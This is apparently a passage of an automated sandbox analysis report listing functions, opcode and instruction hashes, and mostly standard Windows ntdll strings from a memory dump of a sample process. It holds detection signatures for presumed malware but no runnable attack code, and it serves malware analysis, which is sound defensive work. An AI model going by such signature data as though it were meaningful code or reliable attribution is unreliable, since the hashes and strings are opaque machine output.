                                                                                                    • Instruction ID: a1885615ee327d5a1b58ef6b4b00e13e56814568f8d997187dc4071b52c0edff
                                                                                                    • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                    • Instruction Fuzzy Hash: D7F0303A2047449BE706CE1AD050A86BBA6FB55360B044099EC858B351D675E982CF55
                                                                                                    Function 24CAEC20 Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                                    • Instruction ID: 8c33b63b8de9db577da22333b429bb00f72f6af09d3c792bd06a21862f6a96f0
                                                                                                    • Opcode Fuzzy Hash: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                                    • Instruction Fuzzy Hash: 6AF0A0B12C029AAFEB058F09C900F153F9AAB0072EF008419F9488A092C774D984CBA4
                                                                                                    Function 24CA8E1D Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                                                    • Instruction ID: 834c882e5624d39f344112f2391168f922219932c45c530b0debea84353191b7
                                                                                                    • Opcode Fuzzy Hash: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                                                    • Instruction Fuzzy Hash: 62F08C30209A21DFE7315F1EDC41F027BA2BF40720F058A5EE1660B8F4CB65AC82CB94
                                                                                                    Function 24D5678E Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                    • Instruction ID: d60010c6ef6fe6b08be4fe1ea3b15802879edd57d06d942a421ef9cbb0bde0d2
                                                                                                    • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                    • Instruction Fuzzy Hash: 71E0DF32A00120FFEF228799CD01F9A7EADEB94EA0F010158B604E70A4D930DE00C690
                                                                                                    Function 24D84164 Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 62750d1f2214e5f0d6c723783625505a90cbe7caeb5b9c4d90007721645ce9f2
                                                                                                    • Instruction ID: 0e48d52eca5a535fd3c25f30a0708e12b850f34dd53735f6b516f26a05d298eb
                                                                                                    • Opcode Fuzzy Hash: 62750d1f2214e5f0d6c723783625505a90cbe7caeb5b9c4d90007721645ce9f2
                                                                                                    • Instruction Fuzzy Hash: A8F09B319266B14FE353CB28E680F767BE5BF10670F56059CD44587A16E724FD82C650
                                                                                                    Function 24CE8EF5 Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7d341727f723af0e2ba7c09f7d8ec62af74ea18982ecd36a4208e2c101656437
                                                                                                    • Instruction ID: f1b6488310a5e28ecadb9ad4ab19f58df4f5a4fd247125fc3d31e10482febe3c
                                                                                                    • Opcode Fuzzy Hash: 7d341727f723af0e2ba7c09f7d8ec62af74ea18982ecd36a4208e2c101656437
                                                                                                    • Instruction Fuzzy Hash: 1BE0923472E5604BCF124B2896247783BD3AB01690B4414D9EA4CAB642C729D803EA60
                                                                                                    Function 24D6A456 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                    • Instruction ID: 3e097fc7b5d9cca32083e97b0f870fd3489b14fec8c104c399290bf42b300927
                                                                                                    • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                    • Instruction Fuzzy Hash: 0AE06531010A10DBE7325B26EC08B92BAE2BF50791F10882DE1DB059B4C7B5A8C0CA80
                                                                                                    Function 24CB25E0 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 62e6bb3ed0513542a8b2ced04a79a0141f58a5dd0bfb963edf5d768810cec5d4
                                                                                                    • Instruction ID: e9ffe8f3a0b534ef071513f4141e5e25477c16c71f94af86da32a7341afc34ac
                                                                                                    • Opcode Fuzzy Hash: 62e6bb3ed0513542a8b2ced04a79a0141f58a5dd0bfb963edf5d768810cec5d4
                                                                                                    • Instruction Fuzzy Hash: D7E092321005549BD711EB2DDD05F8A7BABEB60760F054615B1565B1A4CA34A850C7C8
                                                                                                    Function 24D34000 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                    • Instruction ID: 7d4926925703476c13166c291084ad2289b044f75d793749901a6cdd36a6e4f9
                                                                                                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                    • Instruction Fuzzy Hash: B8E052793003459FD705CF19C054B667BB6FFD5A50F24C069A9488F20AEB36E842CB51
                                                                                                    Function 24CA823B Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                    • Instruction ID: c2b7cf7df3aef8489157de2cc471955c5884fde8aad667426a618c20fa71bee3
                                                                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                    • Instruction Fuzzy Hash: 8CE0CD31158920DFE7311F1DDC04F5176A3FF54B50F154A6AE0411A0AC87759CC1CBD4
                                                                                                    Function 24CA8C8D Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                    • Instruction ID: db6bc8f59b344d046e432a8e2a2dc2c9c9f282197bd709155e3a6a7379187ab2
                                                                                                    • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                    • Instruction Fuzzy Hash: B6E08631106631EFE7315F1ADD04F42B6A3AB50B54F05846AA001064F496B89889CED5
                                                                                                    Function 24CB2050 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3b253a031de937a263b48dd2630791f4bdeb7cb5ad1ff66ae45d6490eae94993
                                                                                                    • Instruction ID: e578b915b887008e2e14b0af878cb53893c0ea8c564c6f00dc65e5db4a9f761b
                                                                                                    • Opcode Fuzzy Hash: 3b253a031de937a263b48dd2630791f4bdeb7cb5ad1ff66ae45d6490eae94993
                                                                                                    • Instruction Fuzzy Hash: 52E0C232100460ABD711EB5DDD10F8E739FEFB46A0F040221F1919B2E8CA74BC40C798
                                                                                                    Function 24D66ED0 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                                    • Instruction ID: a44fe513290f1b3409f4b8d1d63c392320b046c7053b54fd895a2158ad49d755
                                                                                                    • Opcode Fuzzy Hash: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                                    • Instruction Fuzzy Hash: 9DD05E2D20C2C487D7024929A061BAA7F1E5742E14F28A0BCD5960FA03DA275983E62A
                                                                                                    Function 24CEE59C Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                    • Instruction ID: 7bf2c70fa8b9d5148cd338c920673212712c0ba388e4830b18d5da97c2d597e2
                                                                                                    • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                    • Instruction Fuzzy Hash: 2AD0A932204A20ABE3229A1CFC00FC333E9BB88760F060499F008C7061C3A0AC81CA88
                                                                                                    Function 24CAA0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                    • Instruction ID: 8cb53a3a92972e20af549223eb6b4319774be6c78dd49ea855390d8424f267a9
                                                                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                    • Instruction Fuzzy Hash: 8ED02232312031A3CB184A5AB904F9B6A079B80A90F0A006D350A93800C0068C82D2E0
                                                                                                    Function 24CEC700 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                    • Instruction ID: e7f73097ba8fcac4867a0f71915a4d89c948a940cb379b45c2cf7a33468c36ca
                                                                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                    • Instruction Fuzzy Hash: 42C08C33290648AFD712DF98DD01F467BAAEBA8B80F000021F3048B670C671FC60EA88
                                                                                                    Function 24CD0310 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                    • Instruction ID: 1d40fe00a61dfcf4abe19aa94b50ef2ddffb2609eaad60a9879e4de46a044efd
                                                                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                    • Instruction Fuzzy Hash: B6D01237100248EFCB01DF45C890D9A772BFBD8710F108019FD19076108A31ED62DA50
                                                                                                    Function 24CB0750 Relevance: .0, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                    • Instruction ID: 08c23aac2e0cc7c1f8aefec8b48f92ce14839d3eac0c4be3c2df930dee8c12a1
                                                                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                    • Instruction Fuzzy Hash: 4EC08838320A008FCF02CB2AE280F8833E0FB00300F080880E800CBB22E220EC00CA08
                                                                                                    Function 24D84DAD Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                    • Instruction ID: 9cd1418b2b1d1608aa0f031d69f37ed2e1ffeb288805642716c6032c5fa7c489
                                                                                                    • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                    • Instruction Fuzzy Hash: C6B01233212544CFD7025B24CB00F2832AABF027D0F0904F076008D835D6188910E501
                                                                                                    Function 24CF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                    • API String ID: 48624451-2108815105
                                                                                                    • Opcode ID: 55b987a0df60f9db8fc1749690e169fd19873cfc44de0aebbe59bcfa307d6fba
                                                                                                    • Instruction ID: 36aaf7f9a3ec3c9c65028763a909e53aa098bd216c059dcab7c85336d0a70e2a
                                                                                                    • Opcode Fuzzy Hash: 55b987a0df60f9db8fc1749690e169fd19873cfc44de0aebbe59bcfa307d6fba
                                                                                                    • Instruction Fuzzy Hash: 7351F7B2B005567FDB51DF9C9C9097FFBB9BB08204751816AE454DB64AD239DF008BE0
                                                                                                    Function 24D62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                    • API String ID: 48624451-2108815105
                                                                                                    • Opcode ID: 4cdec458a454c052ca8ca209bacc26014617b3f81fb8f4c15fa9357e5b2cbe06
                                                                                                    • Instruction ID: 06918b3ae0cb8bf36695afbb17e925c5f60c644485de525a34d936f2e07dbae9
                                                                                                    • Opcode Fuzzy Hash: 4cdec458a454c052ca8ca209bacc26014617b3f81fb8f4c15fa9357e5b2cbe06
                                                                                                    • Instruction Fuzzy Hash: DA513971B00645AFDB21EF5CD894A7FBBFAEB44300B40845EE4D6CB685D674EA40CB60
                                                                                                    Function 24CE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 24D24787
                                                                                                    • ExecuteOptions, xrefs: 24D246A0
                                                                                                    • Execute=1, xrefs: 24D24713
                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 24D24655
                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 24D24742
                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 24D24725
                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 24D246FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                    • API String ID: 0-484625025
                                                                                                    • Opcode ID: d6e26b83880d5a13b47c32e1339ea0a34bd15230c5d041d33394a2cf88646d72
                                                                                                    • Instruction ID: dec7d73647089f52b150019e048a12b570bae40595b001d8d8d033e21d7d1f4f
                                                                                                    • Opcode Fuzzy Hash: d6e26b83880d5a13b47c32e1339ea0a34bd15230c5d041d33394a2cf88646d72
                                                                                                    • Instruction Fuzzy Hash: 78510931701619BAEB11DBADDC95FBA77AEEF14304F0400E9E709AB191EB319A458F50
                                                                                                    Function 24D86940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                    • Instruction ID: 8db655c0fc151d55a6ff29650a066a93ecdd999d55019e807d17780db08b6b43
                                                                                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                    • Instruction Fuzzy Hash: 57021475608341AFD305CF28C890E6EBBE5FFC8B14F00896DBA954B264DB35E906CB52
                                                                                                    Function 24CFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm
                                                                                                    • String ID: +$-$0$0
                                                                                                    • API String ID: 1302938615-699404926
                                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                    • Instruction ID: de5bcf485baaa5e736f3fa5f5f2b75a9dd26d45975a9d127022a642822b955a3
                                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                    • Instruction Fuzzy Hash: 4281B070E456498EDB898F6CCC91BEEBBB3AF85350F16415BD850A72D1E73C9940CB60
                                                                                                    Function 24D620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: %%%u$[$]:%u
                                                                                                    • API String ID: 48624451-2819853543
                                                                                                    • Opcode ID: 1d5fbe1c2a6ac8b0d7a5307f08308ebbb0002111b6778d7c4cae3d3d4f5c03bb
                                                                                                    • Instruction ID: 951293e6fc170b21471f9993e5d87fa30fae6ee282ebcf841568470d5ce52b56
                                                                                                    • Opcode Fuzzy Hash: 1d5fbe1c2a6ac8b0d7a5307f08308ebbb0002111b6778d7c4cae3d3d4f5c03bb
                                                                                                    • Instruction Fuzzy Hash: BD215E76E00119ABDB01EFA9DC50AEE7BF9FF64644F45012AEA05E7204E734DA018FA1
                                                                                                    Function 24CDF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 24D202E7
                                                                                                    • RTL: Re-Waiting, xrefs: 24D2031E
                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 24D202BD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                    • API String ID: 0-2474120054
                                                                                                    • Opcode ID: ea3afcfe104015cfe48f9ca0225dec5a59928b96179fc712fcbd80da468c796a
                                                                                                    • Instruction ID: 79db519b2d91c3c7528f0e71cfe339bf7abaf9796a5e9b5b9c3f81c2ee16f2be
                                                                                                    • Opcode Fuzzy Hash: ea3afcfe104015cfe48f9ca0225dec5a59928b96179fc712fcbd80da468c796a
                                                                                                    • Instruction Fuzzy Hash: EDE1B031608741DFD712CF28C880B5ABBE2BF89318F140A6DF6968B2E2D775D945CB52
                                                                                                    Function 24CEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RTL: Resource at %p, xrefs: 24D27B8E
                                                                                                    • RTL: Re-Waiting, xrefs: 24D27BAC
                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 24D27B7F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 0-871070163
                                                                                                    • Opcode ID: 9516dcea789e9df9b68303f4e44d5fc9c1caefa02916d6a75e37b8b52a14eb26
                                                                                                    • Instruction ID: 89e6367939d93e38f34609f40691bc33b23f1f5592f4e67c170d97ef06266bc3
                                                                                                    • Opcode Fuzzy Hash: 9516dcea789e9df9b68303f4e44d5fc9c1caefa02916d6a75e37b8b52a14eb26
                                                                                                    • Instruction Fuzzy Hash: 6641E135705B029FD725CE29C850B7AB7E6FF98710F000A2DF95ADB681EB31E9058B91
                                                                                                    Function 24CEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 24D2728C
                                                                                                    Strings
